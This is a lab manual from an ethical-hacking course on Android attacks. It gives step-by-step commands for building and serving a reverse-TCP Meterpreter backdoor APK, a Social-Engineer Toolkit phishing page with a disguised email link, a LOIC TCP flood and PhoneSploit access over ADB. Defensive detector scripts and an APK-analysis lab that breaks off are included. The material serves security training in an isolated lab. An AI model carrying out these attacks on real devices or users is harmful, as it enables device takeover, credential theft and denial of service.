Module 17: Hacking Mobile Platforms
Scenario
With the advancement of mobile technology, mobility has become a key feature of Internet usage. People’s lifestyles are becoming increasingly reliant on smartphones and tablets. Mobile devices are replacing desktops and laptops, as they enable users to access email, the Internet, and GPS navigation, and to store critical data such as contact lists, passwords, calendars, and login credentials. In addition, recent developments in mobile commerce have enabled users to perform transactions on their smartphones such as purchasing goods and applications over wireless networks, redeeming coupons and tickets, and banking.
Most mobile devices come with options to send and receive text or email messages, as well as download applications via the Internet. Although these functions are technological advances, hackers continue to use them for malicious purposes. For example, they may send malformed APKs (application package files) or URLs to individuals to entice victims to click on or even install them, and so grant the attackers access to users’ login credentials, or whole or partial control of their devices.
Mobile security is becoming more challenging with the emergence of complex attacks that utilize multiple attack vectors to compromise mobile devices. These security threats can lead to critical data, money, and other information being stolen from mobile users and may also damage the reputation of mobile networks and organizations. The belief that surfing the Internet on mobile devices is safe causes many users to not enable their devices’ security software. The popularity of smartphones and their moderately lax security have made them attractive and more valuable targets to attackers.
As an expert ethical hacker or penetration tester, you should first test the mobile platform used by your organization for various vulnerabilities; then, using this information, you should secure it from possible attacks.
In this lab, you will obtain hands-on experience with various techniques of launching attacks on mobile platforms, which will help you to audit their security.
Objective
The objective of the lab is to carry out mobile platform hacking and other tasks that include, but are not limited to:
Exploit the vulnerabilities in an Android device
Obtain users’ credentials
Hack an Android device with a malicious application
Use an Android device to launch a DoS attack on a target
Exploit an Android device through ADB
Perform a security assessment on an Android device
Overview of Hacking Mobile Platforms
At present, smartphones are widely used for both business and personal purposes. Thus, they are a treasure trove for attackers looking to steal corporate or personal data. Security threats to mobile devices have increased with the growth of Internet connectivity, use of business and other applications, various methods of communication available, etc. Apart from certain security threats that are specific to them, mobile devices are also susceptible to many other threats that are applicable to desktop and laptop computers, web applications, and networks.
Nowadays, smartphones offer broad Internet and network connectivity via varying channels such as 3G/4G/5G, Bluetooth, Wi-Fi, or wired computer connections. Security threats may arise while transmitting data at different points along these various paths.
Lab Tasks
Ethical hackers or penetration testers use numerous tools and techniques to attack target mobile devices. The recommended labs that will assist you in learning various mobile attack techniques include:
Hack Android devices
Hack an Android device by creating binary payloads using Parrot Security
Harvest Users’ Credentials using the Social-Engineer Toolkit
Launch a DoS attack on a target machine using Low Orbital Cannon (LOIC) on the Android mobile platform
Exploit the Android platform through ADB using PhoneSploit
Secure Android Devices using Various Android Security Tools
Analyze a malicious app using online Android analyzers
Analyze a malicious app using Quixxi vulnerability scanner
Secure Android devices from malicious apps using Malwarebytes Security
Lab 1: Hack Android Devices
Lab Scenario
The number of people using smartphones and tablets is on the rise, as these devices support a wide range of functionalities. Android is the most popular mobile OS, because it is a platform open to all applications. Like other OSes, Android has its vulnerabilities, and not all Android users install patches to keep OS software and apps up to date and secure. This casualness enables attackers to exploit vulnerabilities and launch various types of attacks to steal valuable data stored on the victims’ devices.
Owing to the extensive usage and implementation of bring your own device (BYOD) policies in organizations, mobile devices have become a prime target for attacks. Attackers scan these devices for vulnerabilities. These attacks can involve the device and the network layer, the data center, or a combination of these.
As a professional ethical hacker or pen tester, you should be familiar with all the hacking tools, exploits, and payloads needed to perform various tests on mobile devices connected to a network in order to assess its security infrastructure.
In this lab, we will use various tools and techniques to hack the target mobile device.
Lab Objectives
Hack an Android device by creating binary payloads using Parrot Security
Harvest Users’ Credentials using the Social-Engineer Toolkit
Launch a DoS attack on a target machine using Low Orbital Cannon (LOIC) on the Android mobile platform
Exploit the Android platform through ADB using PhoneSploit
Overview of Hacking Android Platforms
Android is a software environment developed by Google for mobile devices. It includes an OS, middleware, and key applications. Its Linux-based OS is designed especially for portable devices such as smartphones and tablets. Android has a stack of software components categorized into six sections (System Apps, Java API Framework, Native C/C++ Libraries, Android Runtime, Hardware Abstraction Layer [HAL], and Linux kernel) and five layers.
Owing to the increase in the number of users with Android devices, they have become the primary targets for hackers. Attackers use various Android hacking tools to discover vulnerabilities in the platform, and then exploit them to carry out attacks such as DoS, Man-in-the-Disk, and Spear phone attacks.
Task 1: Hack an Android Device by Creating Binary Payloads using Parrot Security
Attackers use various tools such as Metasploit to create binary payloads, which are sent to the target system to gain control over it. The Metasploit Framework is a Ruby-based, modular penetration testing platform that enables you to write, test, and execute exploit code. It contains a suite of tools that you can use to test security vulnerabilities, enumerate networks, execute attacks, and evade detection. Meterpreter is a Metasploit attack payload that provides an interactive shell that can be used to explore target machines and execute code.
In this task, we will use Metasploit to create a binary payload in Parrot Security to hack an Android device.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
In the login page, the attacker username will be selected by default. Enter password as toor in the Password field and press Enter to log in to the machine.
If a Parrot Updater pop-up appears at the top-right corner of Desktop, ignore and close it.
If a Question pop-up window appears asking you to update the machine, click No to close the window.
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
In the Parrot Terminal window, type service postgresql start and press Enter to start the database service.
Type msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk and press Enter to generate a backdoor (reverse Meterpreter) application.
This command creates an APK (Backdoor.apk) on the Desktop under the root directory (/root/Desktop). In this case, 10.10.10.13 is the IP address of the Parrot Security machine, which the payload connects back to when it runs.
Now, share or send the Backdoor.apk file to the victim machine (in this lab, we are using the Android emulator as the victim machine).
In this task, we are sending the malicious payload through a shared directory, but in real-life cases, attackers may send it via an attachment in an email, over Bluetooth, or through some other application or means.
If the shared folder is not already present, create a folder named share under /var/www/html using the following commands:
Type mkdir /var/www/html/share and press Enter to create the shared folder.
Type chmod -R 755 /var/www/html/share and press Enter to set its permissions.
Type chown -R www-data:www-data /var/www/html/share and press Enter to give the web server ownership of the folder.
Now, type service apache2 start and press Enter to start the Apache web server.
Type cp /root/Desktop/Backdoor.apk /var/www/html/share/ and press Enter to copy the Backdoor.apk file to the share folder.
Type msfconsole and press Enter to launch the Metasploit framework.
In msfconsole, type use exploit/multi/handler and press Enter.
Now, issue the following commands in msfconsole:
Type set payload android/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.13 and press Enter.
Type show options and press Enter. This command lets you know the listening port (in this case, 4444), as shown in the screenshot.
Type exploit -j -z and press Enter. The -j option runs the handler as a background job, and -z tells msfconsole not to interact with a session as soon as it opens.
Click Android to switch to the Android emulator machine.
If the Android machine is unresponsive, click the Commands icon from the top-left corner of the screen and navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch the browser.
In the address bar, type and press Enter.
If a Browse faster. Use less data. notification appears, click No thanks.
If a pop up appears, click Allow.
The Index of /share page appears; click Backdoor.apk to download the application package file.
After the download finishes, a notification appears at the bottom of the browser window. Click Open to open the application.
If Chrome needs storage access to download files, a pop-up will appear; click Continue. If any pop-up appears stating that the file contains a virus, ignore the message and download the file anyway.
In Allow Chrome to access photos, media, and files on your device?, click ALLOW.
If a warning message appears at the lower section of the browser window, click OK.
When the Open with option appears, choose Package installer and click Always.
A MainActivity screen appears; click Next, and then Install.
After the application installs successfully, an App installed notification appears; click OPEN.
Click Parrot Security 4.10 to switch back to the Parrot Security machine. The Meterpreter session has been opened successfully, as shown in the screenshot.
In this case, 10.10.10.14 is the IP address of the victim machine (Android Emulator).
Type sessions -i 1 and press Enter. The Meterpreter shell is launched as shown in the screenshot.
In this command, 1 specifies the number of the session.
Type sysinfo and press Enter. Issuing this command displays information about the target machine, such as computer name, OS, etc.
Type ipconfig and press Enter to display the victim machine’s network interfaces, IP address (IPv4 and IPv6), MAC address, etc. as shown in the screenshot.
Type pwd and press Enter to view the current or present working directory on the remote (target) machine.
Type cd /sdcard and press Enter to change the current remote directory to sdcard.
The cd command changes the current remote directory.
Now, type pwd and press Enter. You will observe that the present working directory has changed to sdcard, that is, /storage/emulated/0.
Now, still in the Meterpreter session, type ps and press Enter to view the processes running in the target system.
The list of running processes might differ in your lab environment.
Because of poor security settings and a lack of awareness, if an individual in an organization installs a backdoor file on their device, the attacker gains control of the device. The attacker can then perform malicious activities such as uploading worms, downloading data, and spying on the user’s keystrokes, which can reveal sensitive information related to the organization as well as the victim.
Close all open windows.
Click Android to switch to the Android machine.
On the Home Screen, swipe up to navigate to the applications.
In the applications section, long-press the MainActivity application and click App info.
The App info page appears; click the UNINSTALL button to uninstall the application.
If a pop-up appears, click OK.
This concludes the demonstration of how to hack an Android device by creating binary payloads using Parrot Security.
Close all open windows and document all the acquired information.
Question 1.1.1:
Which of the following is the target machine in this task?
Ubuntu
Windows 10
Parrot Security
Windows Server 2019
Question 1.1.2:
What is the IPv4 address of the Android machine that is obtained in this task at interface 1?
10.10.10.10
10.10.10.13
10.10.10.14
10.10.10.16
Task 2: Harvest users’ credentials using the Social-Engineer Toolkit
The Social-Engineer Toolkit (SET) is an open-source, Python-driven tool that enables penetration testing via social engineering. It is a generic exploit that can be used to carry out advanced attacks against human targets in order to get them to offer up sensitive information. SET categorizes attacks according to the attack vector used to trick people, such as email, web, or USB. The toolkit attacks human weakness, exploiting people’s trust, fear, avarice, or helpful natures.
In this task, we will sniff user credentials on the Android platform using SET.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
Type cd setoolkit and press Enter to navigate to the setoolkit folder.
Now, type ./setoolkit and press Enter to launch Social-Engineer Toolkit.
The SET menu appears, as shown in the screenshot. Type 1 and press Enter to choose Social-Engineering Attacks.
A list of options for Social-Engineering Attacks appears; type 2 and press Enter to choose Website Attack Vectors.
A list of options in Website Attack Vectors appears; type 3 and press Enter to choose Credential Harvester Attack Method.
Type 2 and press Enter to choose Site Cloner from the menu.
Type the IP address of the local machine (10.10.10.13) in the prompt for “IP address for the POST back in Harvester/Tabnabbing” and press Enter.
In this case, the harvester runs on the Parrot Security machine (IP address: 10.10.10.13), so that is the POST-back address. These details may vary in your lab environment.
Now, you will be prompted for the URL to be cloned; type the desired URL in “Enter the url to clone” and press Enter. In this task, we will clone the URL http://certifiedhacker.com/Online%20Booking/index.htm.
You can clone any URL of your choice.
If a Press {return} if you understand what we’re saying here message appears, press Enter.
If a message appears asking Do you want to attempt to disable Apache?, type y and press Enter.
When the cloning of the website completes, a highlighted message appears and the credential harvester starts, as shown in the screenshot.
Having successfully cloned a website, you must now send the IP address of your Parrot Security machine to a victim and try to trick him/her into clicking on the link.
Click the Firefox icon in the top section of the Desktop to launch a web browser window and open your email account (in this example, we are using Mozilla Firefox and Gmail, respectively). Log in and compose an email.
You can log in to any email account of your choice.
After logging into your email account, click the Compose button in the left pane and compose a fake but enticing email to lure a user into opening the email and clicking on a malicious link.
A good way to conceal a malicious link in a message is to insert text that looks like a legitimate online ticket booking account URL (in this case), but that actually links to your malicious cloned certifiedhacker page.
Position the cursor where you wish to place the fake URL, then click the Insert link icon.
In the Edit Link window, first type the actual address of your cloned site in the Web address field under the Link to section. Then, type the fake URL in the Text to display field. In this case, the actual address of our cloned certifiedhacker site is , and the text that will be displayed in the message is ; click OK.
The fake URL should appear in the message body, as shown in the screenshot.
Verify that the fake URL is linked to the correct cloned site: in Gmail, click the link; the actual URL will be displayed in a “Go to link” pop-up. Once verified, send the email to the intended user.
Click Android to switch to the Android machine.
In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch the browser.
In the Google Chrome browser window, sign in to the email account to which you sent the phishing mail as an attacker. Open the email you sent previously and click to open the malicious link.
When the victim (you in this case) clicks the URL, a new tab opens up, and he/she will be presented with a replica of www.certifiedhacker.com.
The hotel booking page appears; scroll down to the end of the page. Here, the victim is prompted to enter his/her username and password into form fields that look exactly as they do on the genuine website. When the victim enters the Username and Password and clicks Login, the page shows an error, as shown in the second screenshot.
Click Parrot Security 4.10 to switch to the Parrot Security machine. In the terminal window, scroll down to find the Username and Password, displayed in plain text, as shown in the screenshot.
This concludes the demonstration of how to phish user credentials using SET.
Close all open windows and document all the acquired information.
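The lure built in this task relies on a link whose visible text names the booking site while its href points at the cloned page on the attacker's IP. The following is an added example, not part of the lab or of SET: a defender-side check that parses an HTML mail body and flags exactly that mismatch. The mail body is constructed here; the hosts and paths mirror the ones used in the task.

```python
"""Flag anchors in an HTML mail body whose visible text looks like a URL
but whose href resolves to a different host (the Site Cloner lure above).
Added example, not part of the lab; the sample mail is constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse
import ipaddress
import re

# Constructed sample mail: the visible text imitates the booking site,
# the real target is the cloned page served from the attacker's IP.
SAMPLE_MAIL = """
<p>Your booking is confirmed. Review it at
<a href="http://10.10.10.13/Online%20Booking/index.htm">
http://certifiedhacker.com/Online%20Booking/index.htm</a></p>
<p>Help: <a href="https://certifiedhacker.com/help">certifiedhacker.com/help</a></p>
<p>Terms: <a href="https://example.org/terms">Terms of service</a></p>
"""

# Visible text that a reader would take for a web address.
URL_LIKE = re.compile(r"^(?:https?://)?[\w.-]+\.[a-z]{2,}(?:[/?#]\S*)?$", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, normalised visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._text).split())))
            self._href = None


def host_of(url):
    """Lower-cased hostname of a URL; bare 'host/path' text gets a scheme first."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def is_ip(host):
    """True when the host part is a literal IP address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def suspicious_links(html):
    """Return findings for anchors whose display text and href disagree."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = host_of(href)
        reasons = []
        if is_ip(target):
            reasons.append("href points at a bare IP address")
        if URL_LIKE.match(text) and host_of(text) != target:
            reasons.append(f"visible text names {host_of(text)} but href goes to {target}")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_links(SAMPLE_MAIL):
        print(finding["href"], "->", "; ".join(finding["reasons"]))
```

Only the first anchor is reported: its text names certifiedhacker.com while the href goes to 10.10.10.13, which is also a bare IP. The help link agrees with itself and the terms link has no URL-like text, so neither is flagged.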
Question 1.2.1:
Which of the following attack vectors is used in this task?
Credential Harvester Attack Method
Metasploit Browser Exploit Method
Tabnabbing Attack Method
Java Applet Attack Method
Question 1.2.2:
What is the IP address of the target machine in this task?
Task 3: Launch a DoS Attack on a Target machine using Low Orbital Cannon (LOIC) on the Android Mobile Platform
Low Orbit Ion Cannon (LOIC) is an open-source network stress testing and Denial-of-Service (DoS) attack application. LOIC performs a DoS attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the server with TCP or UDP packets with the intention of disrupting the service of a particular host. People have used LOIC to join voluntary botnets.
In this task, we will use LOIC on the Android mobile platform to launch a DoS attack on a target machine.
Click Android to switch to the Android machine.
Click the Commands icon from the top-left corner of the screen and navigate to Power –> Reset/Reboot machine.
If Reset/Reboot machine pop-up appears, click Yes to proceed.
After the machine reboots, on the Home screen, swipe from right to left to navigate to the second page of the Home screen.
On the second page of the Home screen, click the Cx File Explorer app.
Cx File Explorer opens; click 10.10.10.10 from the Network tab and navigate to CEH-Tools –> CEHv11 Module 17 Hacking Mobile Platforms –> Android Hacking Tools –> Low Orbit Ion Cannon (LOIC).
Click the Low Orbit Ion Cannon LOIC_v1.3.apk file.
A Do you want to install this application? screen appears; click INSTALL.
The installation begins; on completion, an App installed notification appears; click OPEN to launch the app.
On the LOIC screen, we will set a target website or machine. In this task, we shall launch a DoS attack on the 10.10.10.19 machine.
In the left pane, in the URL field, type 10.10.10.19 and click the GET IP button.
The IP address of the target machine is displayed under the Manual IP option, as shown in the screenshot.
To launch the attack, first select the TCP radio button; in the right pane, enter 80 as the Port number and in the Threads field, enter 100. Then, click the Start button, as shown in the screenshot.
LOIC begins to flood the target with TCP packets, which we will observe by running Wireshark on the target machine.
Click Windows Server 2019 to switch to the Windows Server 2019 machine. Click Ctrl+Alt+Delete to activate the machine.
Alternatively, you can also click Ctrl+Alt+Delete button under Windows Server 2019 machine thumbnail in the Resources pane or Click Ctrl+Alt+Delete button under Commands (thunder icon) menu.
By default, the Admin user profile is selected; click Pa$$w0rd to paste the password in the Password field and press Enter to log in.
Alternatively, you can also click Pa$$w0rd under Windows Server 2019 machine thumbnail in the Resources pane or Click Type Text | Type Password button under Commands (thunder icon) menu.
If the Networks screen appears, click Yes to allow your PC to be discoverable by other PCs and devices on the network.
On the Desktop, double-click the Wireshark shortcut.
The Wireshark Network Analyzer opens; double-click on the primary network interface (in this case, Ethernet) to start capturing network traffic.
Wireshark starts capturing network packets. Note the huge number of packets coming from the attacker’s machine (in this case, Android, which has the IP address 10.10.10.14), as shown in the screenshot.
The packets from 10.10.10.14 are sent to the target machine (Windows Server 2019), whose IP address is 10.10.10.19.
Click the Stop capturing packets icon in the toolbar to stop the process.
Observe the huge number of packets sent in the Packets field at the bottom of the Wireshark window, as shown in the screenshot.
You may observe degraded performance on the target machine (Windows Server 2019).
Click Android to switch to the Android machine and, in the LOIC application, click the STOP button to stop the attack.
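Watching the Packets counter in Wireshark is a manual way to spot the flood; the rate-based detector below is an added example (not part of the lab or of LOIC) that does the same thing over Wireshark-style capture rows. The rows are constructed to mimic the capture described above (100 threads from 10.10.10.14 hitting port 80 on 10.10.10.19); the one-second window and the 200-packet threshold are assumptions to tune to your own baseline.

```python
"""Rate-based detector for the TCP flood a LOIC run produces, applied to
rows in the shape Wireshark exports (time, source, destination, protocol,
info). Added example, not from the lab; the rows are constructed."""
from collections import defaultdict, deque

WINDOW_SECONDS = 1.0   # assumption: sliding window length
THRESHOLD = 200        # assumption: packets per source/destination/port per window


def build_sample_rows():
    """Constructed rows: light background traffic from another host plus
    a burst from the Android emulator (10.10.10.14) to port 80 on the
    Windows Server 2019 machine (10.10.10.19), as in the lab."""
    rows = []
    for i in range(20):
        rows.append((i * 0.5, "10.10.10.10", "10.10.10.19", "TCP", "52000 > 80 [ACK]"))
    # 100 threads, each sending 3 packets, all inside one second from t=5.0
    for thread in range(100):
        for k in range(3):
            t = 5.0 + (thread * 3 + k) / 300.0
            rows.append((t, "10.10.10.14", "10.10.10.19", "TCP",
                         f"{40000 + thread} > 80 [SYN]"))
    rows.sort()
    return rows


def dst_port(info):
    """Destination port from an Info column such as '40001 > 80 [SYN]';
    None when the column is not in that 'src > dst' form."""
    parts = info.split()
    if len(parts) >= 3 and parts[1] == ">" and parts[2].isdigit():
        return int(parts[2])
    return None


def detect_floods(rows, window=WINDOW_SECONDS, threshold=THRESHOLD):
    """Return {(src, dst, port): peak_count} for every TCP flow whose packet
    count inside any sliding window reaches the threshold."""
    recent = defaultdict(deque)   # flow key -> timestamps still inside the window
    peaks = {}
    for t, src, dst, proto, info in sorted(rows):
        if proto != "TCP":
            continue
        port = dst_port(info)
        if port is None:
            continue
        key = (src, dst, port)
        q = recent[key]
        q.append(t)
        while q and t - q[0] > window:   # drop packets older than the window
            q.popleft()
        if len(q) >= threshold and len(q) > peaks.get(key, 0):
            peaks[key] = len(q)
    return peaks


if __name__ == "__main__":
    for (src, dst, port), count in detect_floods(build_sample_rows()).items():
        print(f"flood: {src} -> {dst}:{port}, {count} packets in {WINDOW_SECONDS}s")
```

The background host never reaches the threshold (20 packets over ten seconds), while the emulator's 300 packets in under a second are reported as one flow with a peak of 300.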
Question 1.3.1:
What is the target address on which the DoS attack was launched?
Question 1.3.2:
Name the primary network interface of Windows Server 2019 in this task.
Ethernet
Ethernet 1
Eth0
Ethernet 2
Task 4: Exploit the Android Platform through ADB using PhoneSploit
Android Debug Bridge (ADB) is a versatile command-line tool that lets you communicate with a device. ADB facilitates a variety of device actions such as installing and debugging apps, and provides access to a Unix shell that you can use to run several different commands on a device.
Usually, developers connect to ADB on Android devices by using a USB cable, but it is also possible to do so wirelessly by enabling a daemon server at TCP port 5555 on the device.
In this task, we will exploit the Android platform through ADB using the PhoneSploit tool.
We will target the Android machine (10.10.10.14) using the Parrot Security machine.
If the Android machine is unresponsive, click the Commands icon from the top-left corner of the screen and navigate to Power –> Reset/Reboot machine. If the Reset/Reboot machine pop-up appears, click Yes to proceed.
Click Parrot Security 4.10 to switch to the Parrot Security machine.
Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window.
A Parrot Terminal window appears. In the terminal window, type sudo su and press Enter to run the programs as a root user.
In the [sudo] password for attacker field, type toor as a password and press Enter.
The password that you type will not be visible.
Now, type cd and press Enter to jump to the root directory.
Now, type cd PhoneSploit and press Enter to navigate to the PhoneSploit folder.
By default, the tool will be cloned in the root directory.
Type python3 -m pip install colorama and press Enter to install the dependency.
Here, the dependency is already present.
Now, type python3 phonesploit.py and press Enter to run the tool.
The PhoneSploit main menu options appear, as shown in the screenshot.
Type 3 and press Enter to select [3] Connect a new phone option.
When prompted to Enter a phones ip address, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
Note: If you get a Connection timed out error, type 3 again and press Enter. If no option appears, type 3 and press Enter again until the Enter a phones ip address prompt appears.
You will see that the target Android device (in this case, 10.10.10.14) is connected through port number 5555.
If you are unable to establish a connection with the target device, press Ctrl+C and repeat steps 8-11.
Now, at the main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
You can observe that a shell command line appears, as shown in the screenshot.
In the shell command line, type pwd and press Enter to view the present working directory on the target Android device.
In the results, you can observe that the PWD is the root directory.
Now, type ls and press Enter to view all the files present in the root directory.
Type cd sdcard and press Enter to navigate to the sdcard folder.
Type ls and press Enter to list all the available files and folders.
In this example, we will download an image file (images.jpeg) that we placed in the Android machine’s Download folder earlier; you can do the same before performing the next steps.
Type cd Download and press Enter to navigate to the Download folder.
Type ls and press Enter to list all the available files in the folder. In this case, we are interested in the images.jpeg file, which we downloaded earlier.
Note down the location of images.jpeg (in this example, /sdcard/Download/images.jpeg). We will download this file in later steps.
Type exit and press Enter to exit the shell command line and return to the main menu.
At the main_menu prompt, type 7 and press Enter to choose Screen Shot a picture on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
When prompted to Enter where you would like the screenshot to be saved, type /home/attacker/Desktop as the location and press Enter. The screenshot of the target mobile device will be saved in the given location. Minimize the Terminal window.
Click Places in the top section of the Desktop; then, from the context menu, click Desktop.
You should see the downloaded screenshot of the targeted Android device (screen.png). Double-click it if you wish to view the screenshot.
Close the Desktop window and switch back to the Terminal window.
At the main_menu prompt, type 14 and press Enter to choose List all apps on a phone.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying the installed apps on the target Android device, as shown in the screenshot.
Using this information, you can use other PhoneSploit options to either launch or uninstall any of the installed apps.
Now, at the main_menu prompt, type 15 and press Enter to choose Run an app. In this example, we will launch a calculator app on the target Android device.
Based on the information obtained in the previous step about the installed applications, you can launch any app of your choice.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
To launch the calculator app, type com.android.calculator2 and press Enter.
After launching the calculator app on the target Android device, click Android to switch to the Android machine.
You will see that the calculator app is running, and that random values have been entered, as shown in the screenshot.
The entered values might differ in your lab environment.
Click Parrot Security 4.10 to switch back to the Parrot Security machine. In the Terminal window, type p and press Enter to navigate to additional PhoneSploit options on the Next Page.
The result appears, displaying additional PhoneSploit options, as shown in the screenshot.
At the main_menu prompt, type 18 and press Enter to choose Show Mac/Inet information for the target Android device.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying the Mac/Inet information of the target Android device.
Now, at the main_menu prompt, type 21 and press Enter to choose the NetStat option.
When prompted to Enter a device name, type the target Android device’s IP address (in this case, 10.10.10.14) and press Enter.
The result appears, displaying netstat information of the target Android device, as shown in the screenshot.
For demonstration purposes, in this task, we are exploiting the Android emulator machine. However, in real life, attackers use the Shodan search engine to find ADB-enabled devices and exploit them to gain sensitive information and carry out malicious activities.
In the same way, you can exploit the target Android device further by choosing other PhoneSploit options such as Install an apk on a phone, Screen record a phone, Turn The Device off, and Uninstall an app.
This concludes the demonstration of how to exploit the Android platform through ADB using PhoneSploit.
Document all the acquired information and close all open windows.
You can also use other Android hacking tools such as NetCut (http://www.arcai.com), drozer (https://labs.f-secure.com), zANTI (https://www.zimperium.com), Network Spoofer (https://www.digitalsquid.co.uk), and DroidSheep ) to hack Android devices.
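Both exposures this lab demonstrates on the device side, the adbd TCP listener on port 5555 used in Task 4 and the outbound Meterpreter session to the handler on port 4444 from Task 1, are visible in the device's own netstat output, which the NetStat option above displays. The audit below is an added example, not part of the lab or of PhoneSploit, that reads such a listing and reports them; the netstat text is constructed in the common netstat -tun layout, and the port list is an assumption you would extend for your own environment.

```python
"""Audit a device's netstat output for an exposed adbd TCP listener
(Task 4, port 5555) and an outbound session to a Metasploit handler
on its default port (Task 1, port 4444).
Added example, not part of the lab; the netstat text is constructed."""
import ipaddress

ADB_TCP_PORT = 5555
HANDLER_PORTS = {4444}   # assumption: the default LPORT seen in Task 1; extend as needed

# Constructed listing representing the emulator after Tasks 1 and 4:
# 10.10.10.14 is the device, 10.10.10.13 the Parrot Security machine.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:5555            0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.14:5555        10.10.10.13:50210       ESTABLISHED
tcp        0      0 10.10.10.14:41230       10.10.10.13:4444        ESTABLISHED
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN
tcp        0      0 10.10.10.14:44120       142.250.0.1:443         ESTABLISHED
"""


def split_addr(addr):
    """'10.10.10.14:4444' -> ('10.10.10.14', 4444); a '*' port becomes 0."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else 0)


def parse_netstat(text):
    """Yield one dict per TCP row of a netstat listing (header skipped)."""
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp":
            continue
        lhost, lport = split_addr(fields[3])
        rhost, rport = split_addr(fields[4])
        yield {"lhost": lhost, "lport": lport,
               "rhost": rhost, "rport": rport, "state": fields[5]}


def is_loopback(host):
    """True only for a literal loopback address such as 127.0.0.1."""
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def audit(text):
    """Return (severity, message) findings for the rows that matter."""
    findings = []
    for c in parse_netstat(text):
        if c["state"] == "LISTEN" and c["lport"] == ADB_TCP_PORT and not is_loopback(c["lhost"]):
            findings.append(("high", f"adbd listening on {c['lhost']}:{ADB_TCP_PORT}: "
                             "ADB over TCP is reachable from the network"))
        elif c["state"] == "ESTABLISHED" and c["lport"] == ADB_TCP_PORT:
            findings.append(("high", f"active ADB session from {c['rhost']}:{c['rport']}"))
        elif c["state"] == "ESTABLISHED" and c["rport"] in HANDLER_PORTS:
            findings.append(("high", f"outbound connection to {c['rhost']}:{c['rport']} "
                             "matches a reverse_tcp handler port"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_NETSTAT):
        print(f"[{severity}] {message}")
```

The loopback-only adb server socket on 5037 and the ordinary HTTPS connection are left alone; the three remaining rows produce the three findings.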
Question 1.4.1:
What is the IP address of the Android machine?
Question 1.4.2:
Name the port through which the Android machine is connected in this task.
Lab 2: Secure Android Devices using Various Android Security Tools
Lab Scenario
Like personal computers, mobile devices store sensitive data and are susceptible to various threats. Therefore, they should be properly secured in order to prevent the compromise or loss of confidential data, lessen the risk of various threats such as viruses and Trojans, and mitigate other forms of abuse. Strict measures and security tools are vital to strengthening the security of these devices.
Android’s growing popularity has led to increased security threats, ranging from typical malware to advanced phishing and identity theft techniques. As a professional ethical hacker or penetration tester, you should scan for any unsecured settings on the mobile device you are assessing, and then take appropriate action to secure them. You must do this before attackers exploit these weaknesses by, for example, downloading sensitive data, committing a crime using the Android device as a launchpad, and ultimately endangering your business.
There are various security tools available for scanning, detecting, and assessing the vulnerabilities and security status of Android devices. Many security software companies have launched their own apps, including several complete security suites with antitheft capabilities.
The tasks in this lab will assist you in performing a security assessment of a target Android device.
Lab Objectives
Analyze a malicious app using online Android analyzers
Analyze a malicious app using Quixxi vulnerability scanner
Secure Android devices from malicious apps using Malwarebytes Security
Overview of Android Security Tools
Android security tools reveal the security posture of particular Android platforms and devices. You can use them to find various ways to strengthen the security and robustness of your organization’s mobile platforms. These tools automate the process of accurate Android platform security assessment.
Task 1: Analyze a Malicious App using Online Android Analyzers
Online Android analyzers allow you to upload an Android APK package and perform a security analysis of it to detect weaknesses in the app. One such analyzer is Sixo Online APK Analyzer.
In this task, we will analyze a malicious app using various online Android analyzers.
In this lab, we will be analyzing the malicious file (Backdoor.apk), which we used in the previous lab to hack the target Android platform.
If the malicious file (Backdoor.apk) is missing then follow the steps given in Lab 1 Task 1 (Hack an Android Device by Creating Binary Payloads using Parrot Security) to re-create the file.
Click Android to switch to the Android machine, click the Google Chrome browser icon on the Home screen to launch Chrome.
Restart the machine if it is unresponsive.
Screenshot
